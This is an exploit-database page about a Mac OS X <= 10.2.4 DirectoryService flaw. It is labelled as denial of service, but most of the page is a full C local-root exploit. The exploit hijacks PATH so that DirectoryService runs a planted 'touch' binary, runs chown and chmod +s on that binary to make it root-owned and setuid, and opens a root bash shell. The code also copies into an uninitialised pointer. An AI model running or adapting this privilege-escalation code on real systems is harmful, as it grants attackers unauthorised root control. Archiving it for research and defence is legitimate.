header-logo
Suggest Exploit
vendor:
Mac OS X
by:
Neeko Oni
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Mac OS X
Affected Version From: OS X <= 10.2.4
Affected Version To: OS X <= 10.2.4
Patch Exists: YES
Related CWE: N/A
CPE: o:apple:mac_os_x:10.2.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mac OS X
2002

MacOSX DirectoryService Denial of Service Vulnerability

It has been reported that a remote attacker may trigger an exception in DirectoryService by repeatedly connecting to specific network ports. An exploit code has been provided which can be compiled as 'touch' and executed to gain root access.

Mitigation:

Restrict access to the vulnerable ports and apply the latest security patches.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/7323/info

MacOSX DirectoryService has been reported prone to a denial of service vulnerability.

It has been reported that a remote attacker may trigger an exception in
DirectoryService by repeatedly connecting to specific network ports. 

/* 
   OS X <= 10.2.4 DirectoryService local root PATH exploit
   DirectoryService must be crashed prior to execution, per
   @stake advisory.  If you discover how to crash DirectoryService
   e-mail me at neeko@haackey.com  [Neeko Oni]

[Copying and pasting code does not make you cool, no matter how many
dollars per hour you make.  Sorry.]

--
Assuming DirectoryService has been crashed/killed, compile
this code as 'touch' (gcc osxds.c -o touch) and execute.

bash$ ./touch
*bunch of stuff here*
euid is root.
bash#

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int 
main(int argc, char **argv)
{
	char           *ORIGPATH;
	int             temp;
	if (argc < 2) {
		if (geteuid() == 0) {
		printf("euid is root.\n");
		setuid(0);
		execl("/bin/bash", "bash", NULL);
		}
		strcpy(ORIGPATH, getenv("PATH"));
		printf("Original path: %s\n", ORIGPATH);
		setenv("PATH", ".", 1);
		printf("New path: %s\n", getenv("PATH"));
		printf("Executing DirectoryService with false PATH...\n");
		if (fork() == 0) {
			execl("/usr/sbin/DirectoryService", "DirectoryService", NULL);
		}
		printf("Forked DirectoryService, pausing before shell exec...\n");
		sleep(3);
		printf("Cross your fingers.\n");
		setenv("PATH", ORIGPATH, 1);
		printf("Path restored: %s\n", getenv("PATH"));
		execl("./touch", "touch", NULL);		
	}
system("/usr/sbin/chown root ./touch;/bin/chmod +s ./touch");
}

Navigation

Suggest Exploit

Services By CQR